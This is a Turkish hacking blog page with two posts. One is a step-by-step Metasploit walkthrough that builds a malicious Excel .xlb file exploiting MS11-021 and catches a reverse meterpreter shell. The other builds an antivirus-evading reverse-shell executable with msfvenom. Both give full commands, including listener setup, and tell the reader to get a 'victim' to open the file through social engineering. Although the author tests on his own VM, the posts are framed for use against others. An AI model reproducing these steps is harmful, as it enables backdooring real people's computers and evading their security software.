meterpreter etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
meterpreter etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

18 Temmuz 2015 Cumartesi

Microsoft Office 2007 Excel .xlb Buffer Overflow Zafiyeti - Detaylı Anlatım

Standard

Windows Xp Sp2 ve Sp3 'lerde bulunan Microsoft Office 2007 Excel .xlb Buffer Overflow zafiyetini test edelim. Ben daha önceden vwmare  kurmuş  olduğum XP işletim sisteminde deneyeceğim.

Kullanacağız Exploit ;
exploit/windows/fileformat/ms11_021_xlb_bof

Kali Linux'umuzu açalım ve metasploitimizi çalıştıralım. Kali'de terminalimizi açalım ve msfconsole komutumuzu yazalım.


Aşağıda bulunan Resim-1'deki gibi komutumuzu yazalım, exploitimiz ayarlarını görüntüleyelim ve çalıştıralım.

Komutumuz :

  • use exploit/windows/fileformat/ms11_021_xlb_bof
RESİM - 1

Daha sonra payloadımızı çağıralım.

  • set PAYLOAD windows/meterpreter/reverse_tcp
RESİM-2

Ayarlarımızı kontrol edelim
  • show options
RESİM-3

Kalimizin İp adresini ve portumuzu belirledikten sonra exploitimizi çalıştıralım.
  • set LHOST {Kali Linux İp Adresinizi Yazınız}
  • run
RESİM-4

msf.xlb dosyamızı oluşturduk. Şimdi dosyamızı Desktop altına kopyalayalım

  • cp /root/.msf4/local/msf.xlb /root/Desktop/
RESİM-5



  • use multi/handler

RESİM-6

Şimdi ise ip adresimizde 4444'lü portumuzu dinlemeye almak için payloadımızı yükleyelim.

  • set PAYLOAD windows/meterpreter/reverse_tcp
RESİM-7



Kali İp adresimizi girelim ve çalıştırıp  kurbanımızın açmasını bekleyelim.

  • set LHOST 192.168.5.128
  • run
RESİM-8


Şimdi bize düşen karşı tarafa bu excel dosyamızı Sosyal Mühendislik yöntemleri ile gönderip açtırmak. Ben kendi Sanal makinemde  kurmuş olduğum xp işletim sistemimde dosyamı açıp test ediyorum. Eğer işlemlerimizi doğru yaptıysak kurban dosyayı açtıktan sonra terminal ekranında meterpreter oturumunu almış olmamız gerekiyor. Dosyayı açıyorum.

RESİM-9

İşlem tamamdır artık kurbanımızın bilgisayarındayız.



Etiketler: , , , , , , , , , , , ,

9 Temmuz 2015 Perşembe

Msfvenom Kullanımı - (Detaylı)

Standard
Bu yazımda msfvenom kullanımı ve özelliklerinden bahsedeğim.
Metasploit ile gelen  msfvenom zararlı kod üretmemizi ve karşı taraftan reverse bağlantı almamızı sağlayan bir araçtır. Zararlı dosyayı oluşturup karşı tarafa Sosyal Mühendislik yöntemlerini kullanarak dosyayı açtırmayı başarmamız gerekiyor.







Öncelikle Kali Linux'umuzu açalım daha sonra terminale gelerek msfvenom -h komutunu girelim.

Resim  1

Resim 1'de görüldüğü gibi msfvenom aracının options seçeneklerini, parametrelerini ve bunların ne işe yaradıklarını görüyoruz.
Bizim Kullanacağımız parametreleri sıralayalım ;


  • -p : (Payload) Oluşturulan zararlı dosya açıldıktan sonra çalışan kod parçası
  • -e : (Encoder) Oluşturulan zararlı dosyayı antivirüslere yakalanmaması için şifreleyen araç seçiminin yapıldığı parametre
  • -i : (İterations) Oluşturulan zararlı dosyayı kaç defa şifreyeleceğini seçeceğimiz parametre
  • -b : (Bad Chars) Oluşturulan zararlı dosyanın çalışabilmesi için çıkaracağımız kötü karakterleri yazdığımız parametre
  • -f : (Format) Oluşturulan zararlı dosyayı hangi formatta kaydeceğimizi belirlediğimiz parametre
  • -a : (Architecture) Oluşturulan zararlı dosyanın hangi mimaride çalışacağını verdiğimiz parametre
  • --platform :Oluşturulan zararlı dosyanın hangi işletim sisteminde çalışacağını verdiğimiz parametre
Ben parametrelere şunları vereceğim.

  • -p : windows/meterpreter/reverse_tcp ( Kurbandan bağlantı almama yarayacak payload )
  • -e : x86/shikata_ga_nai ( Oluşturacağım zararlı dosyayı encode etmemi yarayacak encoder )
  • -i : 5 ( 5 defa encode etmesini istiyorum ) 
  • -b : \x00 ( Kötü karakteri çıkarıyorum )
  • -f : .exe ( Uygulama olarak kaydedeceğim)
  • -a : x86 ( 32 bitlik işletim sisteminde çalışmasını istiyorum )
  • --platform : windows ( Windows işletim sisteminde çalışmasını istiyorum )
  • LHOST : Kendi İp adresinizi yazın
  • LPORT : Hangi portu kullanmak istiyorsanız o portu yazın
Şimdi zararlı dosyamızı verilen parametreler ile oluşturualım. Terminale aşağıdaki gibi yazalım .

 # msfvenom -p windows/meterpreter/reverse_tcp  -e x86/shikata_ga_nai -i 5 -a x86 --platform windows LHOST=192.168.1.5 LPORT=443 -f exe  >  zararlidosya.exe

Resim 2

Resim 2 deki gibi bir çıktı aldıysanız sizde benim gibi zararlı dosyayı oluşturmuş oldunuz.
Artık yapmanız gerek Metasploitte 443'lü portunuzu dinleyeme almak ve Sosyal Mühendislik becerilerinizle karşı tarafa bu dosyayı yollayıp açtırmak.

Etiketler: , , , , , , , , , , , , , , ,